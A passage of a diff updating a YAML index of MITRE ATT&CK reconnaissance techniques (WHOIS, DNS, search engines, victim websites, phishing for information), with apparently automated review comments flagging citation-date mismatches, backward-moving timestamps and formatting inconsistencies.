url: https://www.circl.lu/services/passive-dns/
+ - source_name: DNS-CISA
+ description: CISA. (2016, September 29). DNS Zone Transfer AXFR Requests May
+ Leak Domain Information. Retrieved June 5, 2024.
+ url: https://www.cisa.gov/news-events/alerts/2015/04/13/dns-zone-transfer-axfr-requests-may-leak-domain-information
- source_name: DNS Dumpster
description: Hacker Target. (n.d.). DNS Dumpster. Retrieved October 20, 2020.
url: https://dnsdumpster.com/
+ - source_name: Alexa-dns
+ description: Scanning Alexa's Top 1M for AXFR. (2015, March 29). Retrieved
+ June 5, 2024.
+ url: https://en.internetwache.org/scanning-alexas-top-1m-for-axfr-29-03-2015/
- source_name: Sean Metcalf Twitter DNS Records
description: Sean Metcalf. (2019, May 9). Sean Metcalf Twitter. Retrieved
- May 27, 2022.
- url: https://twitter.com/PyroTek3/status/1126487227712921600/photo/1
+ September 12, 2024.
+ url: https://x.com/PyroTek3/status/1126487227712921600
+ - source_name: Trails-DNS
+ description: SecurityTrails. (2018, March 14). Wrong Bind Configuration Exposes
+ the Complete List of Russian TLD's to the Internet. Retrieved June 5, 2024.
+ url: https://web.archive.org/web/20180615055527/https://securitytrails.com/blog/russian-tlds
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 2.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1596.002:
technique:
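Review bot: The new `DNS-CISA` reference carries a date mismatch: its description says `CISA. (2016, September 29)` while the URL path `news-events/alerts/2015/04/13/` identifies an alert dated April 13, 2015, so one of the two needs correcting to match the page actually linked. In the same hunk the `Sean Metcalf Twitter DNS Records` entry drops the `/photo/1` suffix when moving from twitter.com to x.com; that is fine only if the bare status URL still shows the image the description relies on, which is worth a quick check before merging.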
@@ -54409,7 +55093,7 @@ reconnaissance:
- source_name: WHOIS
url: https://www.whois.net/
description: NTT America. (n.d.). Whois Lookup. Retrieved October 20, 2020.
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2021-04-15T03:50:44.113Z'
name: WHOIS
description: |-
Adversaries may search public WHOIS data for information about victims that can be used during targeting. WHOIS data is stored by regional Internet registries (RIR) responsible for allocating and assigning Internet resources such as domain names. Anyone can query WHOIS servers for information about a registered domain, such as assigned IP blocks, contact information, and DNS nameservers.(Citation: WHOIS)
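Review bot: `modified` for T1596.002 moves backwards here, from '2022-04-25T14:00:00.188Z' to '2021-04-15T03:50:44.113Z'. A modification timestamp should not decrease on an update, and the same pattern recurs below for T1596.001, T1591.003, T1592.001, T1590.004, T1590.003, T1597.001, T1595, T1590.006, T1591.002 and T1592.004, most of which previously carried the identical '2022-04-25T14:00:00.188Z' value. That strongly suggests the old value was a bulk-stamped placeholder and the new one is the object's real STIX `modified` time, which would be an improvement, but please confirm the index was regenerated from the current ATT&CK release and not from an older bundle, since a regression to stale data would look exactly the same in this diff.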
@@ -54425,39 +55109,37 @@ reconnaissance:
x_mitre_is_subtechnique: true
x_mitre_version: '1.0'
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1594:
technique:
- x_mitre_platforms:
- - PRE
- x_mitre_domains:
- - enterprise-attack
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--16cdd21f-da65-4e4f-bc04-dd7d198c7b26
- type: attack-pattern
- created: '2020-10-02T16:51:50.306Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- external_references:
- - source_name: mitre-attack
- external_id: T1594
- url: https://attack.mitre.org/techniques/T1594
- - source_name: Comparitech Leak
- url: https://www.comparitech.com/blog/vpn-privacy/350-million-customer-records-exposed-online/
- description: Bischoff, P. (2020, October 15). Broadvoice database of more
- than 350 million customer records exposed online. Retrieved October 20,
- 2020.
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2024-10-02T18:52:21.278Z'
name: Search Victim-Owned Websites
- description: |-
- Adversaries may search websites owned by the victim for information that can be used during targeting. Victim-owned websites may contain a variety of details, including names of departments/divisions, physical locations, and data about key employees such as names, roles, and contact info (ex: [Email Addresses](https://attack.mitre.org/techniques/T1589/002)). These sites may also have details highlighting business operations and relationships.(Citation: Comparitech Leak)
-
- Adversaries may search victim-owned websites to gather actionable information. Information from these sources may reveal opportunities for other forms of reconnaissance (ex: [Phishing for Information](https://attack.mitre.org/techniques/T1598) or [Search Open Technical Databases](https://attack.mitre.org/techniques/T1596)), establishing operational resources (ex: [Establish Accounts](https://attack.mitre.org/techniques/T1585) or [Compromise Accounts](https://attack.mitre.org/techniques/T1586)), and/or initial access (ex: [Trusted Relationship](https://attack.mitre.org/techniques/T1199) or [Phishing](https://attack.mitre.org/techniques/T1566)).
+ description: "Adversaries may search websites owned by the victim for information
+ that can be used during targeting. Victim-owned websites may contain a variety
+ of details, including names of departments/divisions, physical locations,
+ and data about key employees such as names, roles, and contact info (ex: [Email
+ Addresses](https://attack.mitre.org/techniques/T1589/002)). These sites may
+ also have details highlighting business operations and relationships.(Citation:
+ Comparitech Leak)\n\nAdversaries may search victim-owned websites to gather
+ actionable information. Information from these sources may reveal opportunities
+ for other forms of reconnaissance (ex: [Phishing for Information](https://attack.mitre.org/techniques/T1598)
+ or [Search Open Technical Databases](https://attack.mitre.org/techniques/T1596)),
+ establishing operational resources (ex: [Establish Accounts](https://attack.mitre.org/techniques/T1585)
+ or [Compromise Accounts](https://attack.mitre.org/techniques/T1586)), and/or
+ initial access (ex: [Trusted Relationship](https://attack.mitre.org/techniques/T1199)
+ or [Phishing](https://attack.mitre.org/techniques/T1566)).\n\nIn addition
+ to manually browsing the website, adversaries may attempt to identify hidden
+ directories or files that could contain additional sensitive information or
+ vulnerable functionality. They may do this through automated activities such
+ as [Wordlist Scanning](https://attack.mitre.org/techniques/T1595/003), as
+ well as by leveraging files such as sitemap.xml and robots.txt.(Citation:
+ Perez Sitemap XML 2023)(Citation: Register Robots TXT 2015) "
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: reconnaissance
+ x_mitre_contributors:
+ - James P Callahan, Professional Paranoid
+ x_mitre_deprecated: false
x_mitre_detection: Monitor for suspicious network traffic that could be indicative
of adversary reconnaissance, such as rapid successions of requests indicative
of web crawling and/or large quantities of requests originating from a single
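Review bot: The T1594 `description` switches from the `|-` block scalar used by every other technique in this file to a double-quoted string with escaped `\n\n` paragraph breaks, and it ends with a stray space before the closing quote (`Perez Sitemap XML 2023)(Citation: Register Robots TXT 2015) "`). Both forms are valid YAML, but the quoted style is harder to read and diff, and the trailing space becomes part of the string value. Suggest emitting this description as a `|-` block like its neighbours, or at minimum stripping the trailing space. The new paragraph about hidden directories, `sitemap.xml` and `robots.txt` is itself a sensible addition and is backed by the two citations introduced in the next hunk.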
@@ -54465,13 +55147,41 @@ reconnaissance:
Analyzing web metadata may also reveal artifacts that can be attributed to
potentially malicious activity, such as referer or user-agent string HTTP/S
fields.
- x_mitre_version: '1.0'
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ x_mitre_domains:
+ - enterprise-attack
+ x_mitre_is_subtechnique: false
+ x_mitre_platforms:
+ - PRE
+ x_mitre_version: '1.1'
x_mitre_data_sources:
- 'Application Log: Application Log Content'
- x_mitre_is_subtechnique: false
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
+ type: attack-pattern
+ id: attack-pattern--16cdd21f-da65-4e4f-bc04-dd7d198c7b26
+ created: '2020-10-02T16:51:50.306Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1594
+ external_id: T1594
+ - source_name: Perez Sitemap XML 2023
+ description: Adi Perez. (2023, February 22). How Attackers Can Misuse Sitemaps
+ to Enumerate Users and Discover Sensitive Information. Retrieved July 18,
+ 2024.
+ url: https://medium.com/@adimenia/how-attackers-can-misuse-sitemaps-to-enumerate-users-and-discover-sensitive-information-361a5065857a
+ - source_name: Comparitech Leak
+ description: Bischoff, P. (2020, October 15). Broadvoice database of more
+ than 350 million customer records exposed online. Retrieved October 20,
+ 2020.
+ url: https://www.comparitech.com/blog/vpn-privacy/350-million-customer-records-exposed-online/
+ - source_name: Register Robots TXT 2015
+ description: Darren Pauli. (2015, May 19). Robots.txt tells hackers the places
+ you don't want them to look. Retrieved July 18, 2024.
+ url: https://www.theregister.com/2015/05/19/robotstxt/
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
atomic_tests: []
T1596.001:
technique:
@@ -54496,7 +55206,7 @@ reconnaissance:
url: https://www.circl.lu/services/passive-dns/
description: CIRCL Computer Incident Response Center. (n.d.). Passive DNS.
Retrieved October 20, 2020.
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2021-04-15T03:49:13.409Z'
name: DNS/Passive DNS
description: |-
Adversaries may search DNS data for information about victims that can be used during targeting. DNS information may include a variety of details, including registered name servers as well as records that outline addressing for a target’s subdomains, mail servers, and other hosts.
@@ -54512,8 +55222,6 @@ reconnaissance:
x_mitre_is_subtechnique: true
x_mitre_version: '1.0'
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1591.003:
technique:
@@ -54535,7 +55243,7 @@ reconnaissance:
url: https://threatpost.com/broadvoice-leaks-350m-records-voicemail-transcripts/160158/
description: Seals, T. (2020, October 15). Broadvoice Leak Exposes 350M Records,
Personal Voicemail Transcripts. Retrieved October 20, 2020.
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2021-04-15T03:38:31.983Z'
name: Identify Business Tempo
description: |-
Adversaries may gather information about the victim's business tempo that can be used during targeting. Information about an organization’s business tempo may include a variety of details, including operational hours/days of the week. This information may also reveal times/dates of purchases and shipments of the victim’s hardware and software resources.
@@ -54551,8 +55259,6 @@ reconnaissance:
x_mitre_is_subtechnique: true
x_mitre_version: '1.0'
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1592.001:
technique:
@@ -54578,7 +55284,7 @@ reconnaissance:
url: https://threatconnect.com/blog/infrastructure-research-hunting/
description: 'ThreatConnect. (2020, December 15). Infrastructure Research
and Hunting: Boiling the Domain Ocean. Retrieved October 12, 2021.'
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2021-10-17T16:32:10.810Z'
name: 'Gather Victim Host Information: Hardware'
description: |-
Adversaries may gather information about the victim's host hardware that can be used during targeting. Information about hardware infrastructure may include a variety of details such as types and versions on specific hosts, as well as the presence of additional components that might be indicative of added defensive protections (ex: card/biometric readers, dedicated encryption hardware, etc.).
@@ -54596,13 +55302,11 @@ reconnaissance:
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_data_sources:
- 'Internet Scan: Response Content'
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
identifier: T1592.001
atomic_tests: []
T1598.003:
technique:
- modified: '2024-04-19T13:26:16.082Z'
+ modified: '2024-05-31T04:18:44.567Z'
name: Spearphishing Link
description: |-
Adversaries may send spearphishing messages with a malicious link to elicit sensitive information that can be used during targeting. Spearphishing for information is an attempt to trick targets into divulging information, frequently credentials or other actionable information. Spearphishing for information frequently involves social engineering techniques, such as posing as a source with a reason to collect information (ex: [Establish Accounts](https://attack.mitre.org/techniques/T1585) or [Compromise Accounts](https://attack.mitre.org/techniques/T1586)) and/or sending multiple, seemingly urgent messages.
@@ -54658,7 +55362,7 @@ reconnaissance:
- source_name: ACSC Email Spoofing
description: Australian Cyber Security Centre. (2012, December). Mitigating
Spoofed Emails Using Sender Policy Framework. Retrieved October 19, 2020.
- url: https://www.cyber.gov.au/sites/default/files/2019-03/spoof_email_sender_policy_framework.pdf
+ url: https://web.archive.org/web/20210708014107/https://www.cyber.gov.au/sites/default/files/2019-03/spoof_email_sender_policy_framework.pdf
- source_name: TrendMictro Phishing
description: Babon, P. (2020, September 3). Tricky 'Forms' of Phishing. Retrieved
October 20, 2020.
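Review bot: The `ACSC Email Spoofing` reference now points at a web.archive.org snapshot (`/web/20210708014107/`) but keeps `Retrieved October 19, 2020` in its description. Compare the `OPM Leak` entry further down in this diff, where the switch to an archived URL comes with an updated `Retrieved September 16, 2024`. Either update the retrieved date here as well or state that the original retrieval date is kept on purpose; the same `ACSC Email Spoofing` entry is rewritten again with the same mismatch in the T1598.002 hunk at the end of this diff.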
@@ -54709,7 +55413,6 @@ reconnaissance:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1590.004:
technique:
@@ -54730,7 +55433,7 @@ reconnaissance:
- source_name: DNS Dumpster
url: https://dnsdumpster.com/
description: Hacker Target. (n.d.). DNS Dumpster. Retrieved October 20, 2020.
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2021-04-15T03:33:02.476Z'
name: Network Topology
description: |-
Adversaries may gather information about the victim's network topology that can be used during targeting. Information about network topologies may include a variety of details, including the physical and/or logical arrangement of both external-facing and internal network environments. This information may also include specifics regarding network devices (gateways, routers, etc.) and other infrastructure.
@@ -54746,8 +55449,6 @@ reconnaissance:
x_mitre_is_subtechnique: true
x_mitre_version: '1.0'
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1590.003:
technique:
@@ -54769,7 +55470,7 @@ reconnaissance:
url: https://www.slideshare.net/rootedcon/carlos-garca-pentesting-active-directory-forests-rooted2019
description: García, C. (2019, April 3). Pentesting Active Directory Forests.
Retrieved October 20, 2020.
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2021-04-15T03:34:22.917Z'
name: Network Trust Dependencies
description: |-
Adversaries may gather information about the victim's network trust dependencies that can be used during targeting. Information about network trusts may include a variety of details, including second or third-party organizations/domains (ex: managed service providers, contractors, etc.) that have connected (and potentially elevated) network access.
@@ -54785,8 +55486,6 @@ reconnaissance:
x_mitre_is_subtechnique: true
x_mitre_version: '1.0'
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1597.001:
technique:
@@ -54808,7 +55507,7 @@ reconnaissance:
url: https://d3security.com/blog/10-of-the-best-open-source-threat-intelligence-feeds/
description: Banerd, W. (2019, April 30). 10 of the Best Open Source Threat
Intelligence Feeds. Retrieved October 20, 2020.
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2021-04-15T03:45:30.862Z'
name: Threat Intel Vendors
description: |-
Adversaries may search private data from threat intelligence vendors for information that can be used during targeting. Threat intelligence vendors may offer paid feeds or portals that offer more data than what is publicly reported. Although sensitive details (such as customer names and other identifiers) may be redacted, this information may contain trends regarding breaches such as target industries, attribution claims, and successful TTPs/countermeasures.(Citation: D3Secutrity CTI Feeds)
@@ -54824,12 +55523,10 @@ reconnaissance:
x_mitre_is_subtechnique: true
x_mitre_version: '1.0'
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1589:
technique:
- modified: '2024-04-19T04:27:00.005Z'
+ modified: '2024-09-16T16:09:45.794Z'
name: Gather Victim Identity Information
description: |-
Adversaries may gather information about the victim's identity that can be used during targeting. Information about identities may include a variety of details, including personal data (ex: employee names, email addresses, security question responses, etc.) as well as sensitive details such as credentials or multi-factor authentication (MFA) configurations.
@@ -54869,8 +55566,8 @@ reconnaissance:
external_id: T1589
- source_name: OPM Leak
description: Cybersecurity Resource Center. (n.d.). CYBERSECURITY INCIDENTS.
- Retrieved October 20, 2020.
- url: https://www.opm.gov/cybersecurity/cybersecurity-incidents/
+ Retrieved September 16, 2024.
+ url: https://web.archive.org/web/20230602111604/https://www.opm.gov/cybersecurity/cybersecurity-incidents/
- source_name: Detectify Slack Tokens
description: Detectify. (2016, April 28). Slack bot token leakage exposing
business critical information. Retrieved October 19, 2020.
@@ -54915,11 +55612,10 @@ reconnaissance:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1595.002:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2024-10-15T13:37:31.317Z'
name: Vulnerability Scanning
description: |-
Adversaries may scan victims for vulnerabilities that can be used during targeting. Vulnerability scans typically check if the configuration of a target host/application (ex: software and version) potentially aligns with the target of a specific exploit the adversary may seek to use.
@@ -54959,9 +55655,8 @@ reconnaissance:
url: https://owasp.org/www-project-automated-threats-to-web-applications/assets/oats/EN/OAT-014_Vulnerability_Scanning
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1596:
technique:
@@ -55023,7 +55718,6 @@ reconnaissance:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1595:
technique:
@@ -55049,7 +55743,7 @@ reconnaissance:
url: https://wiki.owasp.org/index.php/OAT-004_Fingerprinting
description: OWASP Wiki. (2018, February 16). OAT-004 Fingerprinting. Retrieved
October 20, 2020.
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2022-03-08T20:58:13.661Z'
name: Active Scanning
description: |-
Adversaries may execute active reconnaissance scans to gather information that can be used during targeting. Active scans are those where the adversary probes victim infrastructure via network traffic, as opposed to other forms of reconnaissance that do not involve direct interaction.
@@ -55070,8 +55764,6 @@ reconnaissance:
- 'Network Traffic: Network Traffic Flow'
- 'Network Traffic: Network Traffic Content'
x_mitre_is_subtechnique: false
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1589.002:
technique:
@@ -55136,7 +55828,6 @@ reconnaissance:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1598.004:
technique:
@@ -55184,7 +55875,6 @@ reconnaissance:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1590.006:
technique:
@@ -55206,7 +55896,7 @@ reconnaissance:
url: https://nmap.org/book/firewalls.html
description: Nmap. (n.d.). Chapter 10. Detecting and Subverting Firewalls
and Intrusion Detection Systems. Retrieved October 20, 2020.
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2021-04-15T03:31:54.275Z'
name: Network Security Appliances
description: |-
Adversaries may gather information about the victim's network security appliances that can be used during targeting. Information about network security appliances may include a variety of details, such as the existence and specifics of deployed firewalls, content filters, and proxies/bastion hosts. Adversaries may also target information about victim network-based intrusion detection systems (NIDS) or other appliances related to defensive cybersecurity operations.
@@ -55222,34 +55912,10 @@ reconnaissance:
x_mitre_is_subtechnique: true
x_mitre_version: '1.0'
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1593.002:
technique:
- x_mitre_platforms:
- - PRE
- x_mitre_domains:
- - enterprise-attack
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--6e561441-8431-4773-a9b8-ccf28ef6a968
- type: attack-pattern
- created: '2020-10-02T16:50:12.809Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- external_references:
- - source_name: mitre-attack
- external_id: T1593.002
- url: https://attack.mitre.org/techniques/T1593/002
- - source_name: SecurityTrails Google Hacking
- url: https://securitytrails.com/blog/google-hacking-techniques
- description: Borges, E. (2019, March 5). Exploring Google Hacking Techniques.
- Retrieved October 20, 2020.
- - source_name: ExploitDB GoogleHacking
- url: https://www.exploit-db.com/google-hacking-database
- description: Offensive Security. (n.d.). Google Hacking Database. Retrieved
- October 23, 2020.
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2024-09-12T19:19:47.758Z'
name: Search Engines
description: |-
Adversaries may use search engines to collect information about victims that can be used during targeting. Search engine services typical crawl online sites to index context and may provide users with specialized syntax to search for specific keywords or specific types of content (i.e. filetypes).(Citation: SecurityTrails Google Hacking)(Citation: ExploitDB GoogleHacking)
@@ -55258,15 +55924,38 @@ reconnaissance:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: reconnaissance
+ x_mitre_deprecated: false
x_mitre_detection: |-
Much of this activity may have a very high occurrence and associated false positive rate, as well as potentially taking place outside the visibility of the target organization, making detection difficult for defenders.
Detection efforts may be focused on related stages of the adversary lifecycle, such as during Initial Access.
+ x_mitre_domains:
+ - enterprise-attack
x_mitre_is_subtechnique: true
+ x_mitre_platforms:
+ - PRE
x_mitre_version: '1.0'
+ type: attack-pattern
+ id: attack-pattern--6e561441-8431-4773-a9b8-ccf28ef6a968
+ created: '2020-10-02T16:50:12.809Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1593/002
+ external_id: T1593.002
+ - source_name: SecurityTrails Google Hacking
+ description: Borges, E. (2019, March 5). Exploring Google Hacking Techniques.
+ Retrieved September 12, 2024.
+ url: https://www.recordedfuture.com/threat-intelligence-101/threat-analysis-techniques/google-dorks
+ - source_name: ExploitDB GoogleHacking
+ description: Offensive Security. (n.d.). Google Hacking Database. Retrieved
+ October 23, 2020.
+ url: https://www.exploit-db.com/google-hacking-database
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1591.002:
technique:
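Review bot: The `SecurityTrails Google Hacking` reference keeps its description `Borges, E. (2019, March 5). Exploring Google Hacking Techniques.` but its URL now points at `recordedfuture.com/threat-intelligence-101/threat-analysis-techniques/google-dorks` with `Retrieved September 12, 2024`. That is a different publisher and, by the path, a different article, so the author, date and title no longer describe the linked page. Either point the entry at an archived copy of the original SecurityTrails post or rewrite the description to match the Recorded Future page; if `source_name` is renamed as part of that, the `(Citation: SecurityTrails Google Hacking)` marker in the T1593.002 description in the previous hunk must be updated to match.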
@@ -55288,7 +55977,7 @@ reconnaissance:
url: https://threatpost.com/broadvoice-leaks-350m-records-voicemail-transcripts/160158/
description: Seals, T. (2020, October 15). Broadvoice Leak Exposes 350M Records,
Personal Voicemail Transcripts. Retrieved October 20, 2020.
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2021-04-15T03:36:58.964Z'
name: Business Relationships
description: |-
Adversaries may gather information about the victim's business relationships that can be used during targeting. Information about an organization’s business relationships may include a variety of details, including second or third-party organizations/domains (ex: managed service providers, contractors, etc.) that have connected (and potentially elevated) network access. This information may also reveal supply chains and shipment paths for the victim’s hardware and software resources.
@@ -55304,8 +55993,6 @@ reconnaissance:
x_mitre_is_subtechnique: true
x_mitre_version: '1.0'
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1593.003:
technique:
@@ -55366,29 +56053,10 @@ reconnaissance:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.0.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1589.003:
technique:
- x_mitre_platforms:
- - PRE
- x_mitre_domains:
- - enterprise-attack
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--76551c52-b111-4884-bc47-ff3e728f0156
- type: attack-pattern
- created: '2020-10-02T14:57:15.906Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- external_references:
- - source_name: mitre-attack
- external_id: T1589.003
- url: https://attack.mitre.org/techniques/T1589/003
- - source_name: OPM Leak
- url: https://www.opm.gov/cybersecurity/cybersecurity-incidents/
- description: Cybersecurity Resource Center. (n.d.). CYBERSECURITY INCIDENTS.
- Retrieved October 20, 2020.
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2024-09-16T16:09:45.795Z'
name: Employee Names
description: |-
Adversaries may gather employee names that can be used during targeting. Employee names be used to derive email addresses as well as to help guide other reconnaissance efforts and/or craft more-believable lures.
@@ -55397,15 +56065,34 @@ reconnaissance:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: reconnaissance
+ x_mitre_deprecated: false
x_mitre_detection: |-
Much of this activity may have a very high occurrence and associated false positive rate, as well as potentially taking place outside the visibility of the target organization, making detection difficult for defenders.
Detection efforts may be focused on related stages of the adversary lifecycle, such as during Initial Access.
+ x_mitre_domains:
+ - enterprise-attack
x_mitre_is_subtechnique: true
+ x_mitre_platforms:
+ - PRE
x_mitre_version: '1.0'
+ type: attack-pattern
+ id: attack-pattern--76551c52-b111-4884-bc47-ff3e728f0156
+ created: '2020-10-02T14:57:15.906Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1589/003
+ external_id: T1589.003
+ - source_name: OPM Leak
+ description: Cybersecurity Resource Center. (n.d.). CYBERSECURITY INCIDENTS.
+ Retrieved September 16, 2024.
+ url: https://web.archive.org/web/20230602111604/https://www.opm.gov/cybersecurity/cybersecurity-incidents/
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1592.004:
technique:
@@ -55431,7 +56118,7 @@ reconnaissance:
url: https://threatconnect.com/blog/infrastructure-research-hunting/
description: 'ThreatConnect. (2020, December 15). Infrastructure Research
and Hunting: Boiling the Domain Ocean. Retrieved October 12, 2021.'
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2021-10-17T16:35:09.668Z'
name: Client Configurations
description: |-
Adversaries may gather information about the victim's client configurations that can be used during targeting. Information about client configurations may include a variety of details and settings, including operating system/version, virtualization, architecture (ex: 32 or 64 bit), language, and/or time zone.
@@ -55449,47 +56136,10 @@ reconnaissance:
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_data_sources:
- 'Internet Scan: Response Content'
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1598.002:
technique:
- x_mitre_platforms:
- - PRE
- x_mitre_domains:
- - enterprise-attack
- x_mitre_contributors:
- - Philip Winther
- - Sebastian Salla, McAfee
- - Robert Simmons, @MalwareUtkonos
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--8982a661-d84c-48c0-b4ec-1db29c6cf3bc
- type: attack-pattern
- created: '2020-10-02T17:08:57.386Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- external_references:
- - source_name: mitre-attack
- external_id: T1598.002
- url: https://attack.mitre.org/techniques/T1598/002
- - source_name: Sophos Attachment
- url: https://nakedsecurity.sophos.com/2020/10/02/serious-security-phishing-without-links-when-phishers-bring-along-their-own-web-pages/
- description: 'Ducklin, P. (2020, October 2). Serious Security: Phishing without
- links – when phishers bring along their own web pages. Retrieved October
- 20, 2020.'
- - source_name: GitHub Phishery
- url: https://github.com/ryhanson/phishery
- description: Ryan Hanson. (2016, September 24). phishery. Retrieved October
- 23, 2020.
- - source_name: Microsoft Anti Spoofing
- url: https://docs.microsoft.com/en-us/microsoft-365/security/office-365-security/anti-spoofing-protection?view=o365-worldwide
- description: Microsoft. (2020, October 13). Anti-spoofing protection in EOP.
- Retrieved October 19, 2020.
- - source_name: ACSC Email Spoofing
- url: https://www.cyber.gov.au/sites/default/files/2019-03/spoof_email_sender_policy_framework.pdf
- description: Australian Cyber Security Centre. (2012, December). Mitigating
